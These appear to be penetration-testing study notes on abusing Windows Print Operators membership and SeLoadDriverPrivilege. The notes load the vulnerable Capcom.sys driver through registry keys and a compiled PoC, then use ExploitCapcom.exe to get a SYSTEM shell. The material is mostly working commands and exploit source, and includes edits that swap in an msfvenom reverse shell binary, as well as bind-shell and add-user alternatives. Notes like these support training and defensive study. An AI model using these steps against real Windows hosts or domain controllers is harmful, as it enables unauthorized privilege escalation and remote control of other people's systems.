Windows Print Operators

• is another highly privileged group, which grants its members the SeLoadDriverPrivilege, rights to manage, create, share, and delete printers connected to a Domain Controller, as well as the ability to log on locally to a Domain Controller and shut it down.

Exploitation - With GUI

Confirming Privileges

whoami /priv

Checking Privileges Again

• use admin cmd

whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
-----------------------------------------------------------
SeMachineAccountPrivilege     Add workstations to domain           Disabled
SeLoadDriverPrivilege         Load and unload device drivers       Disabled
SeShutdownPrivilege           Shut down the system			       Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled

• It's well known that the driver Capcom.sys contains functionality to allow any user to execute shellcode with SYSTEM privileges.

• We can use our privileges to load this vulnerable driver and escalate privileges.

  • • The PoC enables the privilege as well as loads the driver for us.

• Download it locally and edit it, pasting over the includes below.

#include <windows.h>
#include <assert.h>
#include <winternl.h>
#include <sddl.h>
#include <stdio.h>
#include "tchar.h"

• Next, from a Visual Studio 2019 Developer Command Prompt, compile it using cl.exe.

Compile with cl.exe

cl /DUNICODE /D_UNICODE EnableSeLoadDriverPrivilege.cpp

Add Reference to Driver

reg add HKCU\System\CurrentControlSet\CAPCOM /v ImagePath /t REG_SZ /d "\??\C:\Tools\Capcom.sys"

 reg add HKCU\System\CurrentControlSet\CAPCOM /v Type /t REG_DWORD /d 1

Verify Driver is not Loaded

.\DriverView.exe /stext drivers.txt

cat drivers.txt | Select-String -pattern Capcom

• no output should come

Verify Privilege is Enabled

• Run the EnableSeLoadDriverPrivilege.exe binary.

EnableSeLoadDriverPrivilege.exe

Verify Capcom Driver is Listed

.\DriverView.exe /stext drivers.txt

cat drivers.txt | Select-String -pattern Capcom

Use ExploitCapcom Tool to Escalate Privileges

.\ExploitCapcom.exe

• This launches a shell with SYSTEM privileges. ![[Pasted image 20240806113634.png]]

Alternate Exploitation - No GUI

• we will have to modify the ExploitCapcom.cpp code before compiling.

• Here we can edit line 292 and replace "C:\\Windows\\system32\\cmd.exe" with, say, a reverse shell binary created with msfvenom, for example: c:\ProgramData\revshell.exe.

// Launches a command shell process
static bool LaunchShell()
{
    TCHAR CommandLine[] = TEXT("C:\\Windows\\system32\\cmd.exe");
    PROCESS_INFORMATION ProcessInfo;
    STARTUPINFO StartupInfo = { sizeof(StartupInfo) };
    if (!CreateProcess(CommandLine, CommandLine, nullptr, nullptr, FALSE,
        CREATE_NEW_CONSOLE, nullptr, nullptr, &StartupInfo,
        &ProcessInfo))
    {
        return false;
    }

    CloseHandle(ProcessInfo.hThread);
    CloseHandle(ProcessInfo.hProcess);
    return true;
}

• The CommandLine string in this example would be changed to:

 TCHAR CommandLine[] = TEXT("C:\\ProgramData\\revshell.exe");

• We would set up a listener based on the msfvenom payload we generated and hopefully receive a reverse shell connection back when executing ExploitCapcom.exe.

• If a reverse shell connection is blocked for some reason, we can try a bind shell or exec/add user payload.

Automating the Steps

Automating with EopLoadDriver

• To do this, we would run the following:

EoPLoadDriver.exe System\CurrentControlSet\Capcom c:\Tools\Capcom.sys

• We would then run ExploitCapcom.exe to pop a SYSTEM shell or run our custom binary.

Clean-up

Removing Registry Key

reg delete HKCU\System\CurrentControlSet\Capcom

Note: Since Windows 10 Version 1803, the "SeLoadDriverPrivilege" is not exploitable, as it is no longer possible to include references to registry keys under "HKEY_CURRENT_USER".